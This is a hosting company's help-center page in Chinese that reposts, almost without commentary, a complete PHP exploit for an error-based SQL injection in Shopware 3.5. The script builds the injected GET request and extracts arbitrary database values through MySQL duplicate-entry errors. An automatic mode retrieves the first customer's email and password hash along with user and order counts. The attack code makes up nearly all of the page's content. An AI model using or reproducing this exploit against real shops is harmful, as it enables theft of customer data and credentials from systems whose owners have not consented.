始创于2000年 股票代码:831685
咨询热线:0371-60135900 注册有礼 登录
  • 挂牌上市企业
  • 60秒人工响应
  • 99.99%连通率
  • 7*24h人工
  • 故障100倍补偿
您的位置: 网站首页 > 帮助中心>文章内容

Shopware 3.5 – SQL注入漏洞

发布时间:  2012/7/28 18:44:29

 Shopware 3.5 – SQL注入漏洞

直接贴出代码
 
 
function http_req($host, $q)
{
if(!$fs = fsockopen($host, 80))
exit(“Could not open HTTP- Connection to “.$host.”\r\n\r\n”);
$head = “GET /recommendation/bought/Article/”.urlencode(“0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (“.$q.”) FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)”).” HTTP/1.1\r\n”;
$head .= “Host: “.$host.”\r\n”;
$head .= “Connection: Close\r\n\r\n”;
fwrite($fs, $head);
$ret = ”;
while(!feof($fs))
$ret .= fgets($fs, 4096);
fclose($fs);
return $ret;
}
function mask($cont)
{
if(preg_match(‘/Duplicate entry \’(.*)1\’ for/’, $cont, $m))
return $m[1];
else
return false;
}
function space($x)
{
$r = ”;
for($i = 0; $i < $x; $i++)
$r .= ‘ ‘;
return $r;
}
echo “\r\nExploit Title: Shopware 3.5 – SQL Injection\r\n”;
echo “Date: 13.07.2012\r\n”;
echo “Exploit Author: Kataklysmos\r\n”;
echo “Software Link: http://www.shopware.de/\r\n”;
echo “Version: 3.5\r\n\r\n”;
if(!isset($argv[2]))
{
echo ” Usage: \r\n”;
echo ” “.$argv[0].” HOST –auto\r\n”;
echo ” “.$argv[0].” www.shopwaredemo.de –auto\r\n\r\n”;
echo ” “.$argv[0].” HOST QUERY\r\n”;
echo ” “.$argv[0].” www.shopwaredemo.de \”SELECT COUNT(`id`) FROM `s_user`\”\r\n”;
echo ” “.$argv[0].” www.shopwaredemo.de \”SELECT `email` FROM `s_user` LIMIT 0,1\”\r\n\r\n”;
exit(1);
}
if($argv[2] != ‘–auto’)
{
$x = http_req($argv[1], $argv[2]);
if(!$x = mask($x))
exit(“Your query failed!\r\n\r\n”);
echo “Query:\r\n “.$argv[2].”\r\nReturn:\r\n “.$x.”\r\n\r\n”;
}
else
{
$task = array(array(‘Amount of registered users’, ‘SELECT COUNT(`id`) FROM `s_user`’, null),
array(‘E- Mail from first user’, ‘SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1′, null),
array(‘Password from first user’, ‘SELECT `password` FROM `s_user` LIMIT 0,1′, null),
array(‘Amount of orders’, ‘SELECT COUNT(`id`) FROM `s_order`’, null)
);
for($i = 0; $i < count($task); $i++)
{
echo “[ .. ] Task: \”".$task[$i][0].”\”";
$x = http_req($argv[1], $task[$i][1]);
if(!$x = mask($x))
echo “\r[fail] Task: \”".$task[$i][0].”\”\r\n”;
else
{
echo “\r[ ok ] Task: \”".$task[$i][0].”\”\r\n”;
$task[$i][2] = $x;
}
}
echo “\r\n”;
for($i = 0; $i < count($task); $i++)
echo $task[$i][0].space(26-strlen($task[$i][0])).’ : ‘.$task[$i][2].”\r\n”;
echo “\r\n”;
}
?>
 
亿恩科技地址(ADD):郑州市黄河路129号天一大厦608室 邮编(ZIP):450008 传真(FAX):0371-60123888
   联系:亿恩小凡
   QQ:89317007
   电话:0371-63322206

本文出自:亿恩科技【www.enkj.com】

本文出自:亿恩科技【www.enidc.com】
-->

服务器租用/服务器托管中国五强!虚拟主机域名注册顶级提供商!15年品质保障!--亿恩科技[ENKJ.COM]

  • 您可能在找
  • 亿恩北京公司:
  • 经营性ICP/ISP证:京B2-20150015
  • 亿恩郑州公司:
  • 经营性ICP/ISP/IDC证:豫B1.B2-20060070
  • 亿恩南昌公司:
  • 经营性ICP/ISP证:赣B2-20080012
  • 服务器/云主机 24小时售后服务电话:0371-60135900
  • 虚拟主机/智能建站 24小时售后服务电话:0371-60135900
  • 专注服务器托管17年
    扫扫关注-微信公众号
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 亿恩科技 版权所有  地址:郑州市高新区翠竹街1号总部企业基地亿恩大厦  法律顾问:河南亚太人律师事务所郝建锋、杜慧月律师   京公网安备41019702002023号
      1
     
     
     
     

    0371-60135900
    7*24小时客服服务热线